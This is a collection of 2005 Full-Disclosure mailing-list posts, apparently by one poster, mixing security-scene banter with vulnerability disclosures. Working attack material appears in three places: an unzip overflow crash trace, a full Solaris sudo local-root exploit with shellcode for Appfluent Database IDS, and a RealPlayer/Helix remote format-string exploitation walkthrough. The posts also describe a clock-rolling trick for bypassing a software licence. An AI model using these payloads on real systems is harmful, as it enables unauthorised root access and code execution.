Just to add to the pot, this little bug has been there a long time, mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with rather large files? ;) [EMAIL PROTECTED] tmp]$ gdb -q unzip (no debugging symbols found)...Using host libthread_db library /lib/tls/libthread_db.so.1. (gdb) r `perl -e 'print A x 5000'` Starting program: /usr/bin/unzip `perl -e 'print A x 5000'` Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xe000 (no debugging symbols found)...(no debugging symbols found)...unzip: cannot find or open AAA [snip] AA.ZIP. *** glibc detected *** double free or corruption: 0x08075008 *** Program received signal SIGABRT, Aborted. 0xe410 in __kernel_vsyscall () (gdb) bt #0 0xe410 in __kernel_vsyscall () #1 0x002a2955 in raise () from /lib/tls/libc.so.6 #2 0x002a4319 in abort () from /lib/tls/libc.so.6 #3 0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6 #4 0x002dc4ba in free () from /lib/tls/libc.so.6 #5 0x080543a6 in ?? () #6 0x08075008 in ?? () #7 0x0005 in ?? () #8 0x in ?? () (gdb) frame 4 #4 0x002dc4ba in free () from /lib/tls/libc.so.6 (gdb) i r eax0x0 0 ecx0x10b7 4279 edx0x6 6 ebx0x39dff4 3792884 esp0xbfdc2194 0xbfdc2194 ebp0xbfdc21a8 0xbfdc21a8 esi0x39f800 3799040 edi0x8075008134696968 eip0x2dc4ba 0x2dc4ba eflags 0x200246 2097734 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/s $edi 0x8075008: 'A' repeats 196 times (gdb) x/s $esi 0x39f800 main_arena: \001 (gdb) 0x39f802 main_arena+2: (gdb) gdb) r `python -c 'print \x90 * 5'` The program being debugged has been started already. Start it from the beginning? (y or n) y warning: cannot close shared object read from target memory: File in wrong format Starting program: /usr/bin/unzip `python -c 'print \x90 * 5'` Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xe000 (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x90909090 in ?? () (gdb) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Unzip *ALL* verisons ;))
No, it is not an advisory, just adding to rediculous posts on elog and excel - anyone can post dumb bugs that have no code or valid use. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unzip *ALL* verisons ;))
On 19/12/05, Joachim Schipper [EMAIL PROTECTED] wrote I cannot reproduce this, either with A x 5000 or A x 2. I tested unzip-5.52 on Linux/i386-2.6 and OpenBSD/i386-3.8, and saw no error. Joachim [c0ntex@ ~]$ unzip -v | head -1 UnZip 5.32 of 3 November 1997, by Info-ZIP. Maintained by Greg Roelofs. Send [c0ntex@ ~]$ [c0ntex@ ~]$ uname -a SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2 [c0ntex@ ~]$ unzip `perl -e 'print A x 5'` Bus Error (core dumped) [c0ntex@ ~]$ [EMAIL PROTECTED]:~$ unzip -v | head -1 UnZip 5.52 of 28 February 2005, by Info-ZIP. Maintained by C. Spieler. Send [EMAIL PROTECTED]:~$ uname -a Linux debauch 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux [EMAIL PROTECTED]:~$ unzip `perl -e 'print A x 32000'` snip A.ZIP. error: zipfile probably corrupt (segmentation violation) [EMAIL PROTECTED]:~$ [EMAIL PROTECTED] tmp]$ unzip -v | head -1 UnZip 5.51 of 22 May 2004, by Info-ZIP. Maintained by C. Spieler. Send [EMAIL PROTECTED] tmp]$ uname -a Linux linuxbox 2.6.12 #2 Wed Jul 13 10:19:26 BST 2005 i686 i686 i386 GNU/Linux [EMAIL PROTECTED] tmp]$ unzip `perl -e 'print A x 5'` Segmentation fault [EMAIL PROTECTED] tmp]$ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unzip *ALL* verisons ;))
On 19/12/05, KF (lists) [EMAIL PROTECTED] wrote: Im thinking this is a pretty old school bug... this is damn old code I believe. I know its something I found while working at Snosoft but I have no clue whe DVDMAN's code is pointless. Use the source, luke, and stop watching movies. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unzip *ALL* verisons ;))
On 19/12/05, KF (lists) [EMAIL PROTECTED] wrote: Um... the point was that 3 years ago when I found this (or something similar)... the attached exploit worked just fine. I could give a rats ass less what you or anyone else does with it today. The bug was pretty much pointless to begin with anyway. All these folks are talking about not being able to reproduce it... blah blah... well all I was saying was that I have seen a /bin/sh prompt produced via this issue. I'll kindly remove my nose from your uber er33t understanding of this crucial unzip overflow. -KF KF, I wasn't having a go at you buddy, I just found the DVDMAN exploit pretty funny tbh... toddles back to read Matt. 7:6 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Someone is running his mouth again... [Hackerattacks in US linked to Chinese military: researchers]
On 15/12/05, sk / GroundZero [EMAIL PROTECTED] wrote: lol this shows how much skill SANS itself got :P who still thinks their seminars are any good ? omg so that means everything other than script kids is millitary grade hackers ? never heard so much bullshit at once. well unless from n3td3v but thats a diff topic.. SANS are teh l33t yo! Just ask on this list. Everyone who reads this list and has attended a SANS course work in network security, they admin all those networks that don't have any! penetrators hiding on their systems. They also discover all the major flaws in our OS / Applications using all the advanced exploitation techniques SANS discovered!! -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] certifications
Don't be blinded by certificates and qualifications, there are many good hackers and security all-rounders that neither have degrees in CS nor any form of certification. It is an illusion that you need to have these to fulfil your desire to have a security based job. Sure they may help get you in the door of some place or other, but if you can't get in the door without having a cert though you specify all your relevant skills / projects on your CV, then that is probably not a place you want to work at anyway. *boring, with numerous spare rolls of red tape* Pitch yourslef, sell your talent right, detail your skill sets and how they match what the company need and you should have no trouble getting an interview. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Appfluent Batabase IDS Local Root
/* * $ An open security advisory #14 - Appfluent Database IDS Environment Variable Overflow * 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org 2: Bug Released: December 07th 2005 3: Bug Impact Rate: Hi 4: Bug Scope Rate: Local root * $ This advisory and/or proof of concept code must not be used for commercial gain. * Appfluent Database IDS v2.0 http://www.appfluent.com Appfluent Technology is the leading provider of data usage and query performance software designed to help IT organizations improve performance of Business Intelligence (BI) and enterprise applications, reduce the number of databases they maintain and quickly deploy new applications. Appfluent provides a suite of products that clean up and consolidate databases, optimize query performance based on usage, and rapidly analyze applications for both test and production environments. Appfluent provide a Database IDS system that monitors all SQL traffic in real time, logging every user defined transaction to a database, providing an audit trail of all transactions that take place. There are several processes that ecumulate together to provide the IDS solution, including watcher, analyser, alerter and reporter. There is a stack based buffer overflow in all binaries that allow for some malicious attacker to gain unauthorised code execution on the system where the application is installed. Due to incorrect use of strcpy(), and a lack of correct bounds checking, a user can manipulate the $APPFLUENT_HOME environment variable to overflow the stack buffer. The problem is specific to the watcher process, as it needs to be run as root due to the fact that it sniffs all traffic going to an interface. A script installed in $APPFLUENT_HOME/server_oracle/bin is supplied so that administrators can run the process via sudo. When run with sudo, we are provided a vector for root compromise as a default sudo install on Solaris (this example) and other operating systems honour the setting of environment variables. As such, when an attacker crafts $APPFLUENT_HOME in a malicious manner and runs the watcher process, root access to the system is gained. There are a few requirements that need to be met for the attack to be successful, and they include: 1) User is in the sudoers file and is defined as able to run the watcher process 2) Sudo honours environment variables, meaning env_reset or the likes is not set Please note that users must set, or have $APPFLUENT_HOME set for the product to work, and if the above two requirements are met, an attacker is guaranteed to gain unauthorised root access to the system. Appfluent have released a fix and is provided in the latest version of the product = Ver: 2.1.0.103 ### ## Proof run with a default sudo install from sunfreeware. ### [c0ntex@ ~/vuln]$ export SHELLCODE=`printf \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f \xff\x82\x10\x20\xca\x91\xd0\x20\x08\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01 \x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21 \x0b\xd5\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23 \xbf\xf8\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xfd\xd0\x23\xbf\xec\x92\x23\xa0 \x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08` [c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print A x 576'``printf \xff\xbe \xfa\xd0\xff\xbe\xfa\xd0` [c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc Password: Version: 2.0.0.103 do_process: Exception: file: file_stream.cpp line: 338 message: FileStream: fopen : AAA AAA AAA AAA AAA ÿ¾úÐÿ¾úÐ/oracle /config/config : 78 : File name too long code: 78 stack: #0 void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35 #1 virtual void IC::ServerConfig::load() at /home
Re: [Full-disclosure] Re: Google is vulnerable from XSS attack
For what it is worth, it would be trivial right now to name 10 very large online presences that have some form of vulnerability, whether that is XXS, SQL Injection or some other form of web application quirkiness, it's not really a big deal. I do how ever have to agree with ad, it takes far more skill, patience and devotion to develop some form of code based exploit, by either controlling a chunk of memory or a vital register which in the end yields some form of malicious process control than it does to pop an html, java script or sql string/statement in to a field or other input area. On 07/12/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 where is your heap overflow ?? (XSS easy targets) ; n3td3v wrote: Hackers own Google while vulnerabilities remain unpatched. Once they patch a vulnerability, they can own me again! Until then... Google is in the hands of hackers. Since you're having a stab at me. Wheres your Google and Yahoo vulnerabilities? Naw, you don't have any. You prefer to go looking for your SQL injections and cross site scripting in web sites no one has ever heard of or cared about before (easy targets). As the score goes, how many high profile brand names have you found vulnerabilities for? Fancy having a hacking challenge for finding vulnerabilities in major dot-com's? Lets do it! On 12/7/05, Morning Wood [EMAIL PROTECTED] wrote: who owns you? hint: Google ( they own the world ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ5dYr6+LRXunxpxfAQImGRAAj0gfdT3D3Y5XS5H4iIDujA3l8fCXah0F vOxvmPWSFgIvicoNTITrX/MNCqnFXhR5tpbk3m4gUsfb+i4VHoEiNy/GcT3XB2VY ZDSqA3lso3kNH9g+LrVMkI9TnLLKJxicbiJRNFusCQcKECDivipuU/hdMiWM/M2j h+Uh9bCrl5cWFRcsj8WZDeOZu2jtR4lsh96zdkZAQ+IT9M+auwRAoi9KUvcVuyCO 8zoFPmLUsecMU0fc7IeTtODZrhgR9IDQ0kqfRGJpuyR97du7TZrFs+yqzgMn9C2E AU+5b3B51Mi62yGpAvXf89nboMoNOoHNdsd2XhuY36VtRoNeuv0PGDIpB5uxlq+v OezZ9JcBeWYzxXvwlLB4rSlcsN77uR9DoPvx/bCHQLXd2O/1w01/D5PZw3VUHvxJ p7v1FRPBGshqG53RkATbZFKwCyZebYTWbY4E/8hOne1m+wH9hZEk6TVfKwtOmFwE /z5vO2jgULeTTKMOrDWQyaiRRC2Kz5iN7BLTBLOVU2nWTPkY2l06dQoo9xXQ/fnS MmIyzIYbA+Yc17rddxuRM3TCJ7OBbETQkuOBIFNlTRg2UwnzXskAhxD2H9Qyc9hu CPWTQ6IEbB6jMTP18WChzYr5yk475bYLxghdIktvMteCgAB1Q0FxL/bhuVRf8Ipv v4guvZNJVhs= =wspa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Google is vulnerable from XSS attack
Excuse me, I clicked send too soon As I was saying You found a bug, and thats great, well done, congratulations. However, at the end of the day that is all it is. A bug, write it off and end the thread, you have not found the holy grail, you have not discovered the akashic records on this plane, rather you just found a silly, yet valid bug in a random web site. Remember that monkeys can be trained to click a mouse button and paste a 20 letter string in to a URL. On 07/12/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 where is your heap overflow ?? (XSS easy targets) ; n3td3v wrote: Hackers own Google while vulnerabilities remain unpatched. Once they patch a vulnerability, they can own me again! Until then... Google is in the hands of hackers. Since you're having a stab at me. Wheres your Google and Yahoo vulnerabilities? Naw, you don't have any. You prefer to go looking for your SQL injections and cross site scripting in web sites no one has ever heard of or cared about before (easy targets). As the score goes, how many high profile brand names have you found vulnerabilities for? Fancy having a hacking challenge for finding vulnerabilities in major dot-com's? Lets do it! On 12/7/05, Morning Wood [EMAIL PROTECTED] wrote: who owns you? hint: Google ( they own the world ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ5dYr6+LRXunxpxfAQImGRAAj0gfdT3D3Y5XS5H4iIDujA3l8fCXah0F vOxvmPWSFgIvicoNTITrX/MNCqnFXhR5tpbk3m4gUsfb+i4VHoEiNy/GcT3XB2VY ZDSqA3lso3kNH9g+LrVMkI9TnLLKJxicbiJRNFusCQcKECDivipuU/hdMiWM/M2j h+Uh9bCrl5cWFRcsj8WZDeOZu2jtR4lsh96zdkZAQ+IT9M+auwRAoi9KUvcVuyCO 8zoFPmLUsecMU0fc7IeTtODZrhgR9IDQ0kqfRGJpuyR97du7TZrFs+yqzgMn9C2E AU+5b3B51Mi62yGpAvXf89nboMoNOoHNdsd2XhuY36VtRoNeuv0PGDIpB5uxlq+v OezZ9JcBeWYzxXvwlLB4rSlcsN77uR9DoPvx/bCHQLXd2O/1w01/D5PZw3VUHvxJ p7v1FRPBGshqG53RkATbZFKwCyZebYTWbY4E/8hOne1m+wH9hZEk6TVfKwtOmFwE /z5vO2jgULeTTKMOrDWQyaiRRC2Kz5iN7BLTBLOVU2nWTPkY2l06dQoo9xXQ/fnS MmIyzIYbA+Yc17rddxuRM3TCJ7OBbETQkuOBIFNlTRg2UwnzXskAhxD2H9Qyc9hu CPWTQ6IEbB6jMTP18WChzYr5yk475bYLxghdIktvMteCgAB1Q0FxL/bhuVRf8Ipv v4guvZNJVhs= =wspa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SANS Stuff
I recall an email thread this month relating to bootcaps and how advanced SANS was. After having a look at the Stay Sharp courses, I see: Stay Sharp: FAT File System In-Depth Note: This is an advanced course. Students should already be familiar with concepts such as a file system and tools such as a hex editor. While the course does briefly review these concepts, the focus of this course is on the FAT file system. It is recommended that students taking this course should prepare by refreshing themselves with the following concepts: * Conversion between hexadecimal, decimal, and binary numbers * Basic concepts of a file system (e.g. files, directories, and time stamps) You know what a file is right but what about a directory!? lol Enrol now and get a 25% discount on: Stay Sharp: How To Tie Your Shoe laces -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SANS Stuff
On 05/12/05, James Tucker [EMAIL PROTECTED] wrote: Er, in your mail you posted content, not a link to the sans pages. I did look at your mail. No need to be rude. I don't recall calling anyone a prat, so perhaps watch your own rude mouth before speaking. Anyway, just having a festive giggle to myself and I thought someone on the list might find it funny. Guess that counts you out :-) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Return of the Phrack High Council
On 26/11/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: A mirror of the original PHC site: http://www.eurocompton.net/~bhb/phrack/ A mirror of an anti-sec journal (blackhatbloc): http://www.eurocompton.net/~bhb/ el8 magazine: http://web.textfiles.com/ezines/EL8/ Thats just as funny as it was a couple yrs ago From: K2 [EMAIL PROTECTED] To: Lance Spitzner [EMAIL PROTECTED] Subject: Re: glined glined is a type of ban off IRC I was glined == I was globally banned from the undernet if you connect multiple times to IRC with the same IP (3 or more), you will be glined (for abuse) Take care, K2 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Return of the Phrack High Council
On 24/11/05, InfoSecBOFH [EMAIL PROTECTED] wrote: Nigga please... 99.99% of this list are whitehat or script kiddie which is just as bad. So, because the majority who use it are white-hat, that now means they own it? Can I say bollox? It was once 99.9% used by the black-hat community to release new 0day and tekniquez, then one day the corporate $$$ machine found it and started leaching it , now they claim it as theirs? Many people have their career because of full-disclosure and the 'black-hat' postings. Credit where it's due. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BitchX local root
Presented below is an exploit for BitchX, a linux IRC client. If the BitchX binary is installed SetUID (to allow SSL access for non root users for example), an attacker can exploit a stack overflow and gain root privileges. BitchX local root lies, lies. On 23/11/05, Sha0lin [EMAIL PROTECTED] wrote: Hi, 1) BitchX is not setuid by default, so is not dangerous bug, 2) the exploit's date is fake you can test the vuln with this exploit: http://www.securiteam.com/exploits/6J00B2KBFU.html regards, Sha0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacking Boot camps!
Hmm, there was hands on hacking, but by the company that sold you the training, it sounds like you got owned by salesman.c. Blackhat training camps sound pretty good and some of the people are pretty damn skilled, but these others Zone-H, Vigilante and the likes I would avoid. blind leading the blind if you ask me. I'd research who your mentors were before even thinking about signing, On 22/11/05, K Tucker [EMAIL PROTECTED] wrote: Seems that I read from time to time people asking about the merits of these hacker boot camps. It might be helpful if I relate my recent experience. I attended a 5 day Hacker boot camp conducted by Intense school which is part of Vigilar. Cost was $3200, which I paid out of my own pocket. The salesman I spoke with did a great job selling me on the idea of how hands on it was going to be and all the tools the instructor was going to show us how to use. The classes were supposed to be from 8:30am to 6:00pm for the 5 days. The instructor didn't show up until 4:00 pm due to scheduling conflict. We only received 3 hours that day. The following days started at 9:00 not 8:30 as advertised which might seem like a small thing but at $3200 every minute counts! The real disappointment was the quality of the class. There was little actual lab work. 90% of the class was sitting while the instructor read from the class manual while we looked at a slide of the same page he was reading. Sure it was nice to be read things like CAIN and ABEL is a good program for sniffing networks, but we in the class wanted to know how do you use it! We were never shown. We did have a little hands on lab work which involved ethereal and sam spade and netcat. It was hard to get them to work because none of our vmware was connected to the network correctly so we wasted another hour just trying to get that to work! The feeling in the class was that the class computers should have been set up and ready to go before we even arrived. Friday was the big disappointment. The class began at 9:00am and they started the CEH examine at 11:00 am. That test only lasts 3 hours so by 2:00pm the school was over! Most of the class did not take the test because we didn't feel ready. 5 people in the class did take it and 2 passed it. Those 2 were very experienced in network security. The other 3 failed it. I have emailed Intense school 4 times with my concerns but have never heard back from them. I guess they are not too concerned. My feeling is someone would do much better to just get the book Hacking Exposed and download the suggested tools and play with them. You will learn much more and save a lot of money! __ Yahoo! FareChase: Search multiple travel sites in one click. http://farechase.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Realplayer security contact address ?
[EMAIL PROTECTED] On 06/10/05, Full Disclosure [EMAIL PROTECTED] wrote: hey, fd guys anybody know security contact realplayer ? I have googled and looking for it on their website, but nothing founded thx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Publicly Disclosing A Vulnerability
Like wind, better out than in. On 05/10/05, Josh Perrymon [EMAIL PROTECTED] wrote: Ok, I believe in working with the Vendor to inform then of vulnerable software upon finding it in the wild so on… But I have a question… While performing a pen-test for a large company I found a directory transversal vulnerability in a search program— I used Achilles and inserted the DT attack in a hidden field and posted it to the web server. This returned the win.ini.. Cool.. Well… I called the company up and got the lead engineer on the phone.. He seemed a little pissed. He told me that they found the hole internally a couple months ago but they don't want it public and they said I should not tell anyone about it because they don't want their customers at risk. So I ask the list- what is more beneficial to the customer? Not publicly disclosing the risk and hoping that they follow the suggestions of the vendor to upgrade? Or waiting 30 days and send it out? Joshua Perrymon Sr. Security Consultant Network Armor A Division of Integrated Computer Solutions perrymonj( at )networkarmor.com Cell. 850.345.9186 Office: 850.205.7501 x1104 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-Impact license bypass
I seem to have stumbled over a bug in Core Impact licensing mechanisms that will allow anyone to continually use the Core Impact product even after the license has expired. This is not a security issue but it is, I feel, either an oversight or a feature which can be abused to utilise the Core Impact product for longer than designed / desired. In my business funded Core Impact install on this machine, the license expired at the end of last month and the usualy Your license has expired pop-up appears, however it is easy to re-enable Core to a working install by merely changing the system date on the PC to say a month before the product was due to expire. Oops ;) I guess Core is using a very simplistic license mechanism. Emailed CORE two times, 1 week ago, no reply. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
A 4. version :-) On 26/09/05, Morning Wood [EMAIL PROTECTED] wrote: been known since at least v3.2 are you using a 3.x or a 4.x series? i belive the 4.x requires an auth from core before use - Original Message - From: c0ntex [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, September 26, 2005 3:30 AM Subject: [Full-disclosure] CORE-Impact license bypass I seem to have stumbled over a bug in Core Impact licensing mechanisms that will allow anyone to continually use the Core Impact product even after the license has expired. This is not a security issue but it is, I feel, either an oversight or a feature which can be abused to utilise the Core Impact product for longer than designed / desired. In my business funded Core Impact install on this machine, the license expired at the end of last month and the usualy Your license has expired pop-up appears, however it is easy to re-enable Core to a working install by merely changing the system date on the PC to say a month before the product was due to expire. Oops ;) I guess Core is using a very simplistic license mechanism. Emailed CORE two times, 1 week ago, no reply. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RealPlayer HelixPlayer Remote Format String Exploit
/*
*
$ An open security advisory #13 - RealPlayer and Helix Player Remote
Format String Exploit
*
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: September 26th 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Remote
*
$ This advisory and/or proof of concept code must not be used for
commercial gain.
*
UNIX RealPlayer Helix Player
http://real.com
http://helixcommunity.org
The Helix Player is the Helix Community's open source media player
for consumers. It is being developed
to have a rich and usable graphical interface and support a variety
of open media formats like Ogg Vorbis,
Theora etc.
The RealPlayer for Linux is built on top of the Helix Player for
Linux and includes support for several
non-open source components including RealAudio/RealVideo, MP3 etc.
There is a remotly exploitable format string vulnerability in the
latest Helix Media Player suit that will
allow an attacker the possibility to execute malicious code on a
victims computer. The exploit code will
execute a remote shell under the permissions of the user running the
media player, and effects all versions
of RealPlayer and Helix Player.
The bug is exploitable by abusing media, including .rp (relpix)and
.rt (realtext) file formats. Although
others may be effected I stick to realpix file format for this advisory.
Almost all media file input is placed on the heap, so it's not
possible to just pop our way to a supplied
string like with a normal stack based format bug, as such we can't
directly modify GOT, DTORS, etc. leaving
us limited to what we can do.
There are several places where we can control the flow of execution:
popN - call *0x04(eax) - eax is controlled
popN+N - call *0x20(eax) - eax is controlled
popN+NN - call *0x100(edx) - edx is controlled
popN+NNN - ebp - ebp is controlled
popN+ - eip - eip is controlled
however since we are limited to the size of the value that can be
written, it doesn't seem possible to
point at a known good location directly. Since our shellcode is
always mapped via the .rp file between
0x0822 - 0x082f and with control of one pointer at a time
usually, we can not reach the LSB, we
are toast.
In a phrack paper, Riq talks about using sections of the base
pointer to create a 4 byte pointer by
chaining EBP like so:
[Frame 10 EBP]--points to--[Frame 11 EBP]--points to--[Frame 12 EBP]
And can be manipulated something like so:
Frame 10 Frame 11 Frame 12
1|\/
[LSBMSB] [LSBMSB]-- [41414141]
2|^ 3|__^
Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it
ends with EIP pointing at 0x.
So what else can I do?
How about use the fact the file being played is under my control and
only the MSB needs overwritten. This
solves the problem with the size of the valaue I can write. It is
possible to modify the MSB of an EBP
that is reachable, eventually leading to EIP pointing at some good
location after mov %ebp,%esp happens,
resulting in the execution of our shellcode.
1- Create a file with shellcode address `printf \x37\x13\x12\x08`.rp
2- Overwrite EBP MSB with the address of the file location on the stack
3- EBP is moved to ESP
4- EIP is changed to ESP value
5- EIP is owned, shell is spawned
Granted this is not a stable method as the user can freely
manipulate their environment, and we use the
file name, which is stored in an environment variable to trampoline
us to the shellcode. However my goal
here is not to create a worm but a proof-of-concept :p
The supplied POC should work flawlessly on Debian 3.1, with
RealPlayer installed in /usr/local/RealPlayer
and run as shown below.
Sample local run:
Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold
Window 1:
-
[EMAIL PROTECTED]:~$ netstat -an --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp0 0 127.0.0.1:250.0.0.0:* LISTEN
tcp0 0 192.168.88.133:22 192.168.88.1:2080
ESTABLISHED
udp0 0 0.0.0.0:68 0.0.0.0:*
[EMAIL PROTECTED]:~$ ./helix4real
Remote format
Re: [Full-disclosure] CORE-Impact license bypass
CORE is a good product for what it does. Just as NMAP is and just like Nessus is, though relying on them is probably not a good idea for an audit. I rather do all pentesting by hand, nothing can compete against that and I can't think of a time where I have ever used either Nessus or CORE in an audit. Never used CANVAS. I don't care for Automated exploit tools but someone had CORE and I fancied a play as the CORE team are a pretty interesting bunch of guys. On 26/09/05, Josh Perrymon [EMAIL PROTECTED] wrote: While on the topic of Impact... What do you see as the real value of the program? Is it just because it has all the exploits in there and it's GUI based? What can you do with it you cant do by hand? Also- how does it compare to CANVAS? JP -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of c0ntex Sent: Monday, September 26, 2005 3:27 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] CORE-Impact license bypass On 26/09/05, c0ntex [EMAIL PROTECTED] wrote: Sure, but you would hope that once your yearly license key had expired, you would not be able to use the program again, at least to exploit remote boxen. It's not a big deal and I don't want people thinking I am saying this is some 0day or anything, it's dumb but I thought it might be interesting.. to CORE in particular, since I guess they might be inadvertently loosing money that is rightfully theirs, CORE is a great product and deserves the $$$. hence the reason I have uninstalled it. Anyway, any more comments on this issue, send them to CORE. :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
